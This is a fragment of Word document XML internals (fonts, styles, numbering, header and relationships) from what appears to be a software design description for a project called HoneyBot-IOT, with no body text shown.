    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe Semibold">
    <w:altName w:val="Segoe UI Semibold"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Palatino Linotype">
    <w:panose1 w:val="02040502050505030304"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0000287" w:usb1="40000013" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Cambria Math">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00006FF" w:usb1="420024FF" w:usb2="02000000" w:usb3="00000000" w:csb0="0000019F"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621103A" w14:textId="77777777" w:rsidR="003272AD" w:rsidRDefault="003272AD">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FB7C5A1" w14:textId="77777777" w:rsidR="00082B0D" w:rsidRDefault="00082B0D" w:rsidP="00C05C1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="368F4276" w14:textId="77777777" w:rsidR="00082B0D" w:rsidRDefault="00082B0D" w:rsidP="00C05C1F">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F3AAF1C" w14:textId="2DFFD35B" w:rsidR="003272AD" w:rsidRDefault="003272AD">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Software Design Description for &lt;</w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidR="00C05C1F">
      <w:t>HoneyBot</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidR="00C05C1F">
      <w:t>-IOT</w:t>
    </w:r>
    <w:r>
      <w:t>&gt;</w:t>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> PAGE  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>iv</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>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AC34F89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11EE4C54"/>
    <w:lvl w:ilvl="0" w:tplc="92F2EE14">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="600" w:hanging="480"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1200" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1920" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4080" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4800" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6240" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24743705"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C7A1994"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D750F57"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80860BF2"/>
    <w:lvl w:ilvl="0" w:tplc="C0040B5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C3A29DF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8F9606E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="557868B4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1AB611C0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3E12C972">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D80E0FB4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C4269236">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="99F8684C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="33F7362C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="079C38F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1082917985">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="151726859">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="651494694">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="801652291">
    <w:abstractNumId w:val="0"/>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Abdul wadood">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="e5b6d58b3b7aa7ff"/>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updateFields w:val="true"/>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272AD"/>
    <w:rsid w:val="00082B0D"/>
    <w:rsid w:val="001457B9"/>
    <w:rsid w:val="00240A5B"/>
    <w:rsid w:val="0026103F"/>
    <w:rsid w:val="002C2A3E"/>
    <w:rsid w:val="002D6276"/>
    <w:rsid w:val="003272AD"/>
    <w:rsid w:val="003757B4"/>
    <w:rsid w:val="003D02B8"/>
    <w:rsid w:val="00405973"/>
    <w:rsid w:val="005C6601"/>
    <w:rsid w:val="006238CF"/>
    <w:rsid w:val="006325A6"/>
    <w:rsid w:val="00683955"/>
    <w:rsid w:val="0069596F"/>
    <w:rsid w:val="006C1962"/>
    <w:rsid w:val="006F1877"/>
    <w:rsid w:val="00700129"/>
    <w:rsid w:val="00716083"/>
    <w:rsid w:val="007576E3"/>
    <w:rsid w:val="00816F45"/>
    <w:rsid w:val="00880A78"/>
    <w:rsid w:val="00951A02"/>
    <w:rsid w:val="0098656E"/>
    <w:rsid w:val="00A84BE6"/>
    <w:rsid w:val="00A86B40"/>
    <w:rsid w:val="00C05C1F"/>
    <w:rsid w:val="00C72DCA"/>
    <w:rsid w:val="00DA21C5"/>
    <w:rsid w:val="00DE77F0"/>
    <w:rsid w:val="00DF4B5C"/>
    <w:rsid w:val="00E73623"/>
    <w:rsid w:val="00EC7D11"/>
    <w:rsid w:val="00F0564A"/>
    <w:rsid w:val="00F557F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34009E7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{107EC971-30F3-4D5E-8F89-E435492DFDC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iPriority="0"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0"/>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0"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5C6601"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>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5C6601"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005C6601"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005C6601"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="28"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>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rsid w:val="003272AD"/>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3272AD"/>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3272AD"/>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3272AD"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003272AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>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3272AD"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003272AD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:rsid w:val="003272AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:rsid w:val="003272AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:eastAsia="Times New Roman" w:hAnsi="Times" w:cs="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="180" w:after="120" w:line="220" w:lineRule="exact"/>
      <w:ind w:left="360" w:hanging="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
      <w:b/>
      <w:noProof/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120" w:line="220" w:lineRule="exact"/>
      <w:ind w:left="270"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOCEntry">
    <w:name w:val="TOCEntry"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ByLine">
    <w:name w:val="ByLine"/>
    <w:basedOn w:val="Title"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="720"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:spacing w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ChangeHistoryTitle">
    <w:name w:val="ChangeHistory Title"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="60" w:after="60"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w14:ligatures w14:val="none"/>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paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="003272AD"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe Semibold" w:eastAsia="Times New Roman" w:hAnsi="Segoe Semibold" w:cs="Segoe Semibold"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C6601"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005C6601"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0026103F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>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jpeg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId29" Type="http://schemas.microsoft.com/office/2011/relationships/people" Target="people.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1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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5.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId27" 